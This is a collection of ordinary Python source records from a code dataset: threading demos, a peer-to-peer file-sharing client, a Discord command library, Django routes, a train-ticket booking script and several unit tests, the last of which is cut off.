+{"seq_id":"634542635","text":"import threading\n\nimport time \nimport random\n\nqueue = []\n\nMAX_ITEMS = 10\n\n# A factory function that returns a new condition variable object. \n# A condition variable allows one or more threads to wait until\n# they are notified by another thread. \ncondition = threading.Condition()\n\n# class should be inherited from the threading.Thread \nclass ProducerThread(threading.Thread):\n # when inheriting from the \n # thread make sure to override the run function. \n def run(self):\n numbers = range(5)\n # globalizing the variable. \n global queue\n\n while True:\n # the below method tries to hold the lock on the thread. \n condition.acquire()\n if len(queue) == MAX_ITEMS:\n print(\"Queue is full, producer is waiting\")\n # the below methods waits for the buffer to be available. \n condition.wait()\n print(\"Space in queue, Consumer notified producer\")\n number = random.choice(numbers)\n queue.append(number)\n print(\"Produced {}\".format(number))\n # sends a signal to intiamate any threads that is in waiting state. \n condition.notify()\n # releases the lock held by the acuqire method. \n condition.release()\n time.sleep(random.random())\n\nclass ConsumerThread(threading.Thread):\n def run(self):\n global queue\n\n while True:\n condition.acquire()\n if not queue:\n print(\"Nothing in queue, consumer is waiting\")\n condition.wait()\n print(\"Producer added something to queue and notify the Consumer\")\n number = queue.pop(0)\n print(\"Consumder {}\".format(number))\n condition.notify()\n condition.release()\n time.sleep(random.random())\n\nproducer = ProducerThread()\n# non daemon threads will execute for ever and will not terminate \n# Hence daemonizing the threads. \nproducer.daemon = True\nproducer.start()\n\nconsumer = ConsumerThread()\n# non daemon threads will execute for ever and will not terminate \n# Hence daemonizing the threads. \nconsumer.daemon = True\nconsumer.start()\n\n# Keeping the main thread alive so that when we interrupt the main thread\n# the daemon thread also gets killed. \nwhile True:\n time.sleep(1)","sub_path":"Multithreading_Module/5_conditional_statements-consumer-producer-problem.py","file_name":"5_conditional_statements-consumer-producer-problem.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"333683669","text":"\nimport pytest\nimport numpy as np\nimport chem_eq\n\ndef test_eq_concs():\n Kd = 10\n ca_0 = 5\n cb_0 = 11\n ca, cb, cab = chem_eq.eq_concs(Kd, ca_0, cb_0)\n\n assert np.close(Kd, (ca * cb) / cab)\n\n assert ca >= 0 and cb >= 0 and cab >= 0\n","sub_path":"created/4/tests/test_chem_eq.py","file_name":"test_chem_eq.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"58684898","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Dimitrios Paraschas\n# 1562\n# Dimitrios Greasidis\n# 1624\n# Stefanos Papanastasiou\n# 1608\n\n\nfrom __future__ import print_function\nimport logging\nimport os\nimport signal\nimport socket\nimport sys\nimport Queue\nfrom threading import Thread\n\nfrom library.library import json_load\nfrom library.library import json_save\nfrom library.library import send_message\n\n\n#DEBUG = True\nDEBUG = False\n\n\nconfiguration_file = \"\"\nconfiguration = {}\nshare_directory = \"\"\nfull_list_of_files = []\nrequested_file = \"\"\n\n\n# handle keyboard interrupts (CTRL-C)\ndef sigint_handler(signal, frame):\n # cli_output\n print()\n logging.info(\"CTRL-C received, exiting\")\n sys.exit(0)\n\n\nsignal.signal(signal.SIGINT, sigint_handler)\n\n\n# main recursive function used for communication of the client with the server\ndef converse(server, incoming_buffer, own_previous_command):\n global configuration\n global full_list_of_files\n global requested_file\n\n # parse message\n if \"\\0\" not in incoming_buffer:\n incoming_buffer += server.recv(4096)\n return converse(server, incoming_buffer, own_previous_command)\n else:\n index = incoming_buffer.index(\"\\0\")\n message = incoming_buffer[0:index-1]\n incoming_buffer = incoming_buffer[index+1:]\n\n logging.info(\"message received: \" + message)\n\n lines = message.split(\"\\n\")\n fields = lines[0].split()\n command = fields[0]\n\n # protocol messages and answers\n if command == \"AVAILABLE\":\n username = fields[1]\n username = get_name(username)\n\n send_message(server, \"IWANT \" + username + \"\\n\\0\")\n\n return converse(server, incoming_buffer, \"IWANT\")\n\n elif command == \"WELCOME\":\n username = fields[1]\n configuration[\"username\"] = username\n json_save(configuration_file, configuration)\n\n return None, incoming_buffer\n\n elif command == \"FULLLIST\" and own_previous_command == \"SENDLIST\":\n number_of_files = int(fields[1])\n\n if number_of_files != (len(lines) - 1):\n logging.warning(\"invalid FULLLIST message, wrong number of files\")\n send_message(server, \"ERROR\\n\\0\")\n sys.exit(-1)\n else:\n full_list_of_files = lines[1:]\n\n # cli_output\n print()\n print(\"full list of clients' files\")\n for line in lines[1:]:\n print(line)\n\n return None, incoming_buffer\n\n elif command == \"AT\" and own_previous_command ==\"WHERE\":\n peer_ip = fields[1]\n peer_port = int(fields[2])\n\n return (peer_ip, peer_port), incoming_buffer\n\n elif command == \"OK\" and own_previous_command in (\"LIST\", \"LISTENING\"):\n return None, incoming_buffer\n\n elif command == \"ERROR\":\n logging.warning(\"ERROR message received, exiting\")\n sys.exit(-1)\n\n else:\n # TODO\n # handle invalid commands\n logging.warning('an invalid command was received: \"{}\"'.format(command))\n sys.exit(-1)\n\n\n# create a socket and establish a connection\ndef connection_init(address):\n ip, port = address\n\n try:\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error:\n logging.error(\"socket.socket error\")\n sys.exit(-1)\n\n try:\n connection.connect( (ip, port) )\n # cli_output\n logging.info(\"connected to server or peer {}:{}\".format(ip, port))\n except socket.error:\n # cli_output\n logging.debug(\"failed to connect to port {}, exiting\".format(port))\n sys.exit(-1)\n\n return connection\n\n\n# get a username from the user\ndef get_name(username_):\n # cli_output\n print('Specify a username (press enter for the default \"{}\"): 
'.format(username_))\n username = raw_input()\n\n if username == \"\":\n username = username_\n\n return username\n\n\n# connect to a peer\ndef peer_function(connection, address):\n \"\"\"\n connection : connection socket\n address : (IP_address, port)\n \"\"\"\n global share_directory\n\n incoming_buffer = \"\"\n\n while True:\n # parse message\n while \"\\0\" not in incoming_buffer:\n incoming_buffer += connection.recv(4096)\n\n index = incoming_buffer.index(\"\\0\")\n message = incoming_buffer[0:index-1]\n incoming_buffer = incoming_buffer[index+1:]\n\n logging.info(\"message received: \" + message)\n\n fields = message.split()\n command = fields[0]\n # handle and respond to the message\n if command == \"GIVE\":\n file_ = share_directory + \"/\" + fields[1]\n\n if os.path.isfile(file_):\n # get the file size\n file_size = os.path.getsize(file_)\n\n send_message(connection, \"TAKE {}\\n\\0\".format(str(file_size)))\n\n file__ = open(file_, \"rb\")\n\n file_buffer = \"\"\n file_buffer = file__.read(1024)\n while file_buffer:\n print(\"sending: \" + file_buffer)\n connection.send(file_buffer)\n file_buffer = file__.read(1024)\n\n # cli_output\n logging.info(\"file {} sent\".format(file_))\n\n file__.close()\n else:\n send_message(connection, \"ERROR\\n\\0\")\n connection.close()\n break\n\n elif command == \"THANKS\":\n connection.close()\n break\n\n else:\n send_message(connection, \"ERROR\\n\\0\")\n connection.close()\n break\n\n return\n\n\n# create a server socket and start listening for incoming connections\ndef listen(listening_ip, listening_port, queue):\n try:\n listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error:\n logging.error(\"socket.socket error\")\n sys.exit(-1)\n\n try:\n listening_socket.bind( (listening_ip, listening_port) )\n except socket.error:\n logging.error(\"port {} in use, exiting\".format(listening_port))\n sys.exit(-1)\n\n # listen for incoming connections\n listening_socket.listen(5)\n\n # cli_output\n logging.info(\"client listening on {}:{}\".format(listening_ip, str(listening_port)))\n\n listening_port = listening_socket.getsockname()[1]\n\n # pass the listening_ip and listening_port to the main thread\n queue.put( (listening_ip, listening_port) )\n\n # handle incoming peer connections\n peer_counter = 0\n while True:\n connection, address = listening_socket.accept()\n # cli_output\n logging.info(\"a peer connected from {}:{}\".format(address[0], str(address[1])))\n\n peer_thread = Thread(name=\"peer {}\".format(peer_counter),\n target=peer_function, args=(connection, address))\n # TODO\n # handle differently, terminate gracefully\n peer_thread.daemon = True\n peer_thread.start()\n\n peer_counter += 1\n\n\n# handle file requests and transfers\ndef give_me(peer):\n global requested_file\n\n # cli_output\n print()\n print(\"file name:\")\n requested_file = raw_input()\n\n send_message(peer, \"GIVE {}\\n\\0\".format(requested_file))\n\n incoming_buffer = \"\"\n\n # parse message\n while \"\\0\" not in incoming_buffer:\n incoming_buffer += peer.recv(4096)\n\n index = incoming_buffer.index(\"\\0\")\n message = incoming_buffer[0:index-1]\n incoming_buffer = incoming_buffer[index+1:]\n\n logging.info(\"message received: \" + message)\n\n fields = message.split()\n command = fields[0]\n\n if command == \"TAKE\":\n file_size = fields[1]\n\n # get the file\n while len(incoming_buffer) < int(file_size):\n incoming_buffer += peer.recv(4096)\n logging.debug(\"received: \" + incoming_buffer)\n # TODO\n # save the file chunk by 
chunk\n\n file_to_save = open(share_directory + \"/\" + requested_file, \"wb\")\n file_to_save.write(incoming_buffer)\n file_to_save.close()\n\n logging.info(\"file {} received\".format(requested_file))\n logging.info(\"reconnect to the server to refresh the shared files list\")\n send_message(peer, \"THANKS\\n\\0\")\n peer.close()\n\n elif command == \"ERROR\":\n return\n\n else:\n # TODO\n # handle invalid commands\n logging.warning('an invalid command was received: \"{}\"'.format(command))\n sys.exit(-1)\n\n\ndef main():\n global configuration\n global configuration_file\n global full_list_of_files\n global share_directory\n\n # logging configuration\n logging.basicConfig(level=logging.DEBUG,\n format=\"[%(levelname)s] (%(threadName)s) %(message)s\",\n filename=\"client.log\",\n filemode=\"w\")\n console = logging.StreamHandler()\n if DEBUG:\n # set the console logging level to debug\n console.setLevel(logging.DEBUG)\n else:\n # set the console logging level to info\n console.setLevel(logging.INFO)\n formatter = logging.Formatter(\"[%(levelname)s] (%(threadName)s) %(message)s\")\n console.setFormatter(formatter)\n logging.getLogger(\"\").addHandler(console)\n\n configuration_file = \"configuration.json\"\n\n if os.path.isfile(configuration_file):\n # load the configuration from the json file\n configuration = json_load(configuration_file)\n else:\n # create and initialize the configuration file\n configuration[\"server_host\"] = \"localhost\"\n configuration[\"server_port\"] = 45000\n configuration[\"listening_ip\"] = \"localhost\"\n configuration[\"listening_port\"] = 0\n configuration[\"share_directory\"] = \"share\"\n json_save(configuration_file, configuration)\n\n logging.debug(\"configuration: \" + str(configuration))\n\n share_directory = configuration[\"share_directory\"]\n files_list = [ file_ for file_ in os.listdir(share_directory) if os.path.isfile(os.path.join(share_directory, file_)) ]\n\n logging.debug(\"files_list: \" + str(files_list))\n\n server_address = (configuration[\"server_host\"], configuration[\"server_port\"])\n server = connection_init(server_address)\n\n\n # start with an empty incoming message buffer\n incoming_buffer = \"\"\n\n\n # send HELLO command\n ############################################################################\n if \"username\" in configuration:\n send_message(server, \"HELLO \" + configuration[\"username\"] + \"\\n\\0\")\n else:\n send_message(server, \"HELLO\\n\\0\")\n\n unneeded, incoming_buffer = converse(server, incoming_buffer, \"HELLO\")\n\n\n # send LISTENING command\n ############################################################################\n listening_ip = configuration[\"listening_ip\"]\n listening_port = configuration[\"listening_port\"]\n\n queue = Queue.Queue()\n\n # spawn listening thread\n listening_thread = Thread(name=\"ListeningThread\", target=listen,\n args=(listening_ip, listening_port, queue))\n # TODO\n # handle differently, terminate gracefully\n listening_thread.daemon = True\n listening_thread.start()\n\n listening_ip, listening_port = queue.get()\n\n listening_message = \"LISTENING {} {}\\n\\0\".format(listening_ip, listening_port)\n send_message(server, listening_message)\n\n converse(server, incoming_buffer, \"LISTENING\")\n\n\n # send LIST command\n ############################################################################\n list_message = \"LIST {}\\n\".format(len(files_list))\n for file_ in files_list:\n list_message += file_ + \"\\n\"\n list_message += \"\\0\"\n send_message(server, list_message)\n\n 
converse(server, incoming_buffer, \"LIST\")\n\n\n # send SENDLIST command\n ############################################################################\n send_message(server, \"SENDLIST \" + \"\\n\\0\")\n\n converse(server, incoming_buffer, \"SENDLIST\")\n\n\n # options menu/loop\n ############################################################################\n while True:\n print()\n print(\"options:\")\n print(\"1: SENDLIST / s : request the list of clients and shared files\")\n print(\"2: WHERE / w : request the IP address and port of the specified client\")\n print(\"5: QUIT / q : exit the program\")\n\n option = raw_input()\n if option in [\"1\", \"s\", \"S\", \"sendlist\", \"SENDLIST\"]:\n send_message(server, \"SENDLIST \" + \"\\n\\0\")\n\n converse(server, incoming_buffer, \"SENDLIST\")\n\n elif option in [\"2\", \"w\", \"W\", \"where\", \"WHERE\"]:\n print(\"Enter the username of the client:\")\n\n while True:\n client = raw_input()\n\n if client == configuration[\"username\"]:\n print(\"{} is you, try again: \".format(client))\n continue\n\n if client in [pair.split()[0] for pair in full_list_of_files]:\n break\n\n print(\"{} is an invalid client username, try again: \".format(client))\n\n send_message(server, \"WHERE \" + client + \"\\n\\0\")\n\n (peer_ip, peer_port), incoming_buffer = converse(server, incoming_buffer, \"WHERE\")\n\n peer = connection_init( (peer_ip, peer_port) )\n\n give_me(peer)\n\n elif option in [\"5\", \"q\", \"Q\", \"quit\", \"QUIT\"]:\n sys.exit(0)\n\n else:\n print(\"invalid option, try again\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":13361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
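The client in the record above repeats the same NUL-delimited framing loop in `converse()`, `peer_function()`, and `give_me()`. A hypothetical helper (the name `recv_message` is illustrative, not from the source) that consolidates it; the closed-socket check is an addition the original lacks, and string handling matches the record's Python 2 `str` usage:

```python
def recv_message(sock, buffer=""):
    # Read until a NUL delimiter arrives, then split one message off the front.
    while "\0" not in buffer:
        chunk = sock.recv(4096)
        if not chunk:
            raise RuntimeError("peer closed the connection mid-message")
        buffer += chunk
    index = buffer.index("\0")
    message = buffer[0:index - 1]    # drop the "\n" that precedes "\0" in this protocol
    return message, buffer[index + 1:]
```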
+{"seq_id":"24946604","text":"# Copyright (c) 2018 James Patrick Dill\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport inspect\nimport re\n\nimport discord\n\nfrom detache import errors\n\n\nclass Context(object):\n \"\"\"\n Command context, passed to command functions for easier handling\n\n :attr discord.Message message: Message\n :attr discord.Guild guild: Guild the message was sent in\n :attr discord.Channel channel: Channel the message was sent in\n :attr discord.Member: author: Author of the message\n \"\"\"\n\n def __init__(self, plugin, message, prefix=\"\"):\n self.plugin = plugin\n\n self.message = message\n\n self.guild = message.guild\n self.channel = message.channel\n self.author = message.author\n\n self.prefix = prefix\n\n async def send(self, *args, **kwargs):\n \"\"\"\n Coroutine\n\n Sends a message in the context's channel. Pass the same arguments or keywords that you would to\n :meth:`discord.Channel.send`\n \"\"\"\n\n await self.channel.send(*args, **kwargs)\n\n\n# empty class returned when an type doesn't match\nclass NoMatch:\n pass\n\n\n# argument types\n\nclass Any:\n pattern = \"[^ ]+\"\n\n @classmethod\n def convert(cls, ctx, raw):\n \"\"\"\n Converts string argument to specified type.\n\n :param ctx: Context.\n :param str raw: Raw passed argument.\n \"\"\"\n\n return raw\n\n @classmethod\n def consume(cls, ctx, args):\n \"\"\"\n Parses an argument from an argument string, and returns the argument string with this argument consumed.\n\n :return: parsed, argString\n \"\"\"\n\n match = re.match(cls.pattern, args, flags=re.IGNORECASE)\n\n if match:\n match = match[0]\n\n parsed = cls.convert(ctx, match)\n\n span = len(match)\n if span >= len(args):\n return parsed, \"\"\n\n return parsed, args[span + 1:] # remove this argument from arguments string\n\n else:\n return NoMatch, args\n\n\nclass String(Any):\n pattern = r'(\"[^\\n]+\"|[^ \\n]+)'\n\n @classmethod\n def convert(cls, ctx, raw):\n # if the string is multi-word, it is surrounded in quotes. remove them\n if raw[0] == raw[-1] == '\"':\n return raw[1:-1]\n\n return raw\n\n\nclass Number(Any):\n pattern = \"\\d+(\\.\\d+)?\"\n\n @classmethod\n def convert(cls, ctx, raw):\n try:\n if \".\" in raw:\n return float(raw)\n else:\n return int(raw)\n\n except ValueError:\n raise errors.WrongType(\"{!r} is not a number.\".format(raw))\n\n\nclass User(Any):\n pattern = \"(<@!?([0-9]+)>|.{2,32}#[0-9]{4})\"\n\n @classmethod\n def convert(cls, ctx, raw):\n # if contains \"#\", user tag was passed. 
otherwise, mention\n if \"#\" in raw:\n member = ctx.guild.get_member_named(raw)\n else:\n user_id = int(re.search(\"[0-9]+\", raw)[0])\n member = ctx.guild.get_member(user_id)\n\n if member is None:\n raise errors.ParsingError(\"{} isn't a member of {}.\".format(raw, ctx.guild))\n\n return member\n\n\nclass Channel(Any):\n pattern = r'(<#([0-9]+)>|#.{1,255})'\n\n @classmethod\n def convert(cls, ctx, raw):\n # if starts with \"#\", name of channel was passed.\n if raw.startswith(\"#\"):\n name = raw[1:]\n\n channel = discord.utils.get(ctx.guild.text_channels, name=name)\n else:\n channel_id = int(re.search(\"[0-9]+\", raw)[0])\n\n channel = discord.utils.get(ctx.guild.text_channels, id=channel_id)\n\n if channel is None:\n raise errors.ParsingError(\"{} isn't a channel in {}.\".format(raw, ctx.guild))\n\n return channel\n\n\nclass Role(Any):\n pattern = r'(<@&[0-9]+>|\"[^\\n]+\"|[^ \\n]+)'\n\n @classmethod\n def convert(cls, ctx, raw):\n # if starts with \"<@&\", role mention was passed.\n if raw.startswith(\"<@&\") and raw.endswith(\">\"):\n role_id = int(re.search(\"[0-9]+\", raw)[0])\n\n role = discord.utils.get(ctx.guild.roles, id=role_id)\n else:\n name = raw\n\n if name[0] == name[-1] == '\"': # multi word, remove quotes\n name = name[1:-1]\n\n role = discord.utils.get(ctx.guild.roles, name=name)\n\n if role is None:\n raise errors.ParsingError(\"{} isn't a role in {}.\".format(raw, ctx.guild))\n\n return role\n\n\n# argument decorator\n\ndef argument(name, type=None, default=None, required=True, nargs=1, help=None):\n \"\"\"\n Command argument.\n\n :param name: Name of the argument. Should match one of the function's arguments.\n :param type: (Optional) Argument type. Leave as None to accept any type.\n :param default: (Optional) Default value.\n :param required: (Optional) Whether the argument is required. Defaults to True\n :param nargs: (Optional) Number of times the argument can occur. Defaults to 1. 
-1 allows unlimited arguments.\n :param help: (Optional) Argument description.\n\n If nargs is anything other than 1, the parsed argument will be returned as a list.\n \"\"\"\n\n if nargs not in (1, -1) and not required:\n raise ValueError(\"nargs must = 1 or -1 for arguments that aren't required\")\n\n type = type or Any # default ArgumentType class accepts anything as valid argument\n\n class Argument:\n @classmethod\n def no_match_error(cls):\n if nargs == 1:\n raise errors.ParsingError(\n \"**{}** is a required {}.\".format(name, type.__name__.lower())\n )\n else:\n raise errors.ParsingError(\n \"**{}** are required.\".format(name + (\"\" if name.endswith(\"s\") else \"s\")) # use plural\n )\n\n @classmethod\n def consume(cls, ctx, args):\n \"\"\"\n Parses an argument from an argument string, and returns the argument string with this argument consumed.\n\n :return: parsed, argString\n \"\"\"\n\n parsed, args = type.consume(ctx, args) # use argument type's parsing function\n\n if parsed is NoMatch: # argument is wrong type or not found\n if required or nargs != 1:\n cls.no_match_error()\n else:\n parsed = default\n\n return parsed, args\n\n Argument.name = name\n Argument.help = help\n Argument.type_ = type\n Argument.nargs = nargs\n Argument.required = required\n\n # actual decorator\n def add_argument(func):\n if hasattr(func, \"cmd_args\"):\n func.cmd_args.append(Argument) # add to command function's arg list\n else:\n func.cmd_args = [Argument] # arg list doesnt exist, create it\n\n return func\n\n return add_argument\n\n\n# used to check plugin for commands\nclass CommandInherit:\n pass\n\n\ndef command(name, description=None, required_permissions=None):\n \"\"\"\n Command decorator. Put this before a command and its arguments.\n\n :param str name: Name of command\n :param str description: Description of commands\n :param list[str] required_permissions: (Optional) Permissions required to use command\n \"\"\"\n\n class Command(CommandInherit):\n def __init__(self, func):\n self.name = name\n self.description = description or inspect.cleandoc(inspect.getdoc(func))\n\n self.args = list(reversed(getattr(func, \"cmd_args\", []))) # fix order of arguments\n\n self.func = func\n\n self.__doc__ = self.make_doc()\n\n def __repr__(self):\n return \"Command({!r})\".format(self.name)\n\n def make_doc(self, prefix=\"\"):\n doc = \"{}**{}** \".format(prefix, self.name) + \" \".join([arg.name for arg in self.args]) + \"\\n\\n\" # syntax\n\n # list arg types, names, descriptions\n for arg in self.args:\n arg_name = arg.type_.__name__ + (\"(s)\" if arg.nargs != 1 else \"\")\n\n doc += \"• {} **{}**\".format(arg_name, arg.name)\n\n if arg.help is not None:\n doc += \" - {}\".format(arg.help)\n\n doc += \"\\n\"\n\n doc += \"\\n\" + self.description\n\n return doc\n\n async def process(self, ctx, content):\n # process given arguments and run the command\n\n # check for required permissions before parsing\n if required_permissions is not None:\n author_perms = ctx.author.permissions_in(ctx.channel)\n\n for perm in required_permissions:\n # check permission. 
if not specified in permissions, assume False\n if not getattr(author_perms, perm, False):\n raise errors.MissingPermissions(\"This command requires the `{}` permission.\".format(perm))\n\n parsed_args = {}\n\n try:\n for arg in self.args:\n # parse argument and update with what's left of argument string\n\n if arg.nargs == 1: # only 1 arg\n parsed, content = arg.consume(ctx, content)\n\n parsed_args[arg.name] = parsed\n\n elif arg.nargs == -1: # any number of args\n parsed = []\n\n while True:\n try:\n value, content = arg.consume(ctx, content)\n\n parsed.append(value)\n except errors.ParsingError as e: # no more args\n if len(parsed) == 0 and arg.required:\n # must pass at least one arg if it's required\n raise e\n\n break\n\n parsed_args[arg.name] = parsed\n else:\n parsed = []\n\n for i in range(arg.nargs): # limit to nargs\n try:\n value, content = arg.consume(ctx, content)\n\n parsed.append(value)\n except errors.ParsingError: # no more args\n break\n\n parsed_args[arg.name] = parsed\n\n except errors.ParsingError as e:\n raise errors.ParsingError(\"{}\\n\\n{}\".format(e, self.make_doc(ctx.prefix)))\n\n reply = await self.func(ctx.plugin, ctx, **parsed_args)\n\n if reply:\n await ctx.send(reply)\n\n return Command\n","sub_path":"detache/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":11581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"632402921","text":"from logger import log\nfrom time import sleep\n\nmsg = ''\n\n\n# add @log to the principle method call.\n\n@log\ndef mock_write(m):\n global msg\n sleep(0.0001) # simulated write time\n msg = m\n\n\n@log\ndef mock_read():\n global msg\n sleep(0.0001) # simulated read time\n print(msg)\n\n\n# call WRITE/READ functions\nfor i in range(1000):\n mock_write(f'demo string {i}')\n mock_read()\n","sub_path":"Datastores & Distributed File Systems/common/logusage.py","file_name":"logusage.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"520956808","text":"# ------------------------------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------------------------------\n\nfrom dapr.clients import DaprClient\n\nwith DaprClient() as d:\n key = 'secretKey'\n storeName = 'localsecretstore'\n\n resp = d.get_secret(store_name=storeName, key=key)\n print('Got!')\n print(resp._secret)\n","sub_path":"examples/secret_store/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"350994006","text":"from django.urls import path\nfrom django.contrib.auth.views import LogoutView\n\nfrom .views import (\n Index, ProductDetail,\n GlobalCategoryDetail,\n CategoryDetail,\n RegistrationView,\n AddToCart,\n CartView,\n DeleteCartProduct,\n ChangeCartProductAmount,\n UserProfile,\n OrderView,\n LoginView,\n CartOrderedView,\n CreateNewView,\n )\n\n\nurlpatterns = [\n path('', Index.as_view(), name='index'),\n path('detail//', ProductDetail.as_view(), name='product_detail'),\n path('global//', GlobalCategoryDetail.as_view(), name='global_category_detail'),\n path('not-global//', CategoryDetail.as_view(), name='category_detail'),\n path('registration/', RegistrationView.as_view(), name='registration'),\n path('login/', LoginView.as_view(), name='login'),\n path('logout/', LogoutView.as_view(), name='logout'),\n path('add-to-cart//', AddToCart.as_view(), name='add_to_cart'),\n path('cart-detail/', CartView.as_view(), name='cart_detail'),\n path('del-cart-product//', DeleteCartProduct.as_view(), name='del_cart_product'),\n path('change-amount//', ChangeCartProductAmount.as_view(), name='change_amount'),\n path('user-profile/', UserProfile.as_view(), name='user_profile'),\n path('create-order/', OrderView.as_view(), name='create_order'),\n path('order-detail//', CartOrderedView.as_view(), name='order_view'),\n path('create-new/', CreateNewView.as_view(), name='create_new'),\n]\n","sub_path":"mainapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"618482503","text":"import time\n\nfrom global_data.session import LOGIN_SESSION\nfrom logic.login.login import NormalLogin\nfrom logic.query.query import Query\nfrom config import Config\nfrom logic.submit.fastsubmit import FastSubmitDcOrder\nfrom logic.submit.submit import NormalSubmitDcOrder\nfrom utils.send_email import send_email\nfrom utils.log import Log\nfrom utils.data_loader import LocalSimpleCache\n\n\nclass Schedule(object):\n retry_login_time = Config.basic_config.retry_login_time\n login_status = False\n order_id = ''\n\n def run(self):\n s = LocalSimpleCache('', 'logincookie.pickle').get_final_data()\n if not s.raw_data:\n count = 0\n while self.retry_login_time:\n l = NormalLogin()\n Log.v(\"正在为您登录\")\n status, msg = l.login()\n if not status:\n count += 1\n Log.v(\"登录失败, 重试{0}次\".format(count))\n self.retry_login_time -= 1\n continue\n else:\n Log.v(\"登录成功\")\n Log.v(\"导出已经登录的cookie,已便下次使用\")\n Log.v(\"cookie的有效期为 {0}小时\".format(s.expire_time))\n s.raw_data = LOGIN_SESSION.cookies\n s.export_pickle()\n break\n if not self.retry_login_time:\n Log.v(\"重试次数已经超过设置\")\n return\n else:\n Log.v(\"加载已经登录的cookie\")\n LOGIN_SESSION.cookies.update(s.raw_data)\n Log.v(\"正在查询车次余票信息\")\n count = 0\n while True:\n count += 1\n q = Query()\n data = q.filter()\n if not data:\n Log.v(\"满足条件的车次暂无余票,正在重新查询\")\n for v in data:\n print(v[0])\n q.pretty_output(v[1])\n time.sleep(5)\n Log.v(\"查询{0}次\".format(count))\n for v in data:\n if Config.basic_config.fast_submit:\n submit = FastSubmitDcOrder(v[1], v[0])\n else:\n submit = NormalSubmitDcOrder(v[1], v[0])\n f = submit.run()\n if not f:\n continue\n else:\n self.order_id = submit.order_id\n break\n if self.order_id:\n break\n\n Log.v(\"抢票成功,如果有配置邮箱,稍后会收到邮件通知\")\n # 抢票成功发邮件信息\n send_email(2, **{\"order_no\": self.order_id})\n\n\nif __name__ == \"__main__\":\n instance = Schedule()\n instance.run()\n","sub_path":"python12306/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"192949196","text":"import unittest\nimport numpy as np\nimport pandas as pd\nimport os\nfrom numpy.testing import assert_array_equal\nfrom cacb.cacb import ContinuousActionContextualBanditModel\n\n\nnp.random.seed(123)\n\n\nmock_log_data = pd.DataFrame(\n [\n [0.90, 115, -3, 0, 0, 0],\n [0.90, 100, 0, 0, 0, 1],\n [0.90, 105, -1, 0, 1, 0],\n [0.90, 110, 2, 0, 1, 1],\n [0.0333, 120, 4, 1, 1, 0],\n ]\n)\n\nmock_file = \"./tests/mock.csv\"\n\n\nclass ContinuousActionContextualBanditModelTest(unittest.TestCase):\n def setUp(self):\n mock_log_data.to_csv(mock_file, header=None, index=None) # type: ignore\n\n def test_get_actions(self):\n actions1 = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n )._get_actions()\n self.assertListEqual(actions1, [10, 11, 12, 13, 14, 15])\n\n actions2 = ContinuousActionContextualBanditModel(\n min_value=-10,\n max_value=-5,\n action_width=1,\n )._get_actions()\n self.assertListEqual(actions2, [-10, -9, -8, -7, -6, -5])\n\n actions3 = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=2,\n )._get_actions()\n self.assertListEqual(actions3, [10, 12, 14])\n\n def test_get_actions_one_hot(self):\n actions_one_hot = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n )._get_actions_one_hot(12)\n assert_array_equal(actions_one_hot, np.array([0, 0, 1, 0, 0, 0]))\n\n def test_log_example(self):\n context = np.array([1, 2, 3])\n action = 11\n cost = 100\n prob = 0.75\n\n # uncategorized actions\n cacb_1 = ContinuousActionContextualBanditModel(\n min_value=10, max_value=15, action_width=1, categorize_actions=False\n )\n cacb_1._log_example(context, action, cost, prob)\n assert_array_equal(\n cacb_1.logged_data, np.array([0.75, 100, 11, 1, 2, 3]).reshape(1, -1)\n )\n\n # categorized actions\n cacb_2 = ContinuousActionContextualBanditModel(\n min_value=10, max_value=15, action_width=1, categorize_actions=True\n )\n cacb_2._log_example(context, action, cost, prob)\n assert_array_equal(\n cacb_2.logged_data,\n np.array([0.75, 100, 0, 1, 0, 0, 0, 0, 1, 2, 3]).reshape(1, -1),\n )\n\n # log another example\n cacb_2._log_example(context, 10, 90, 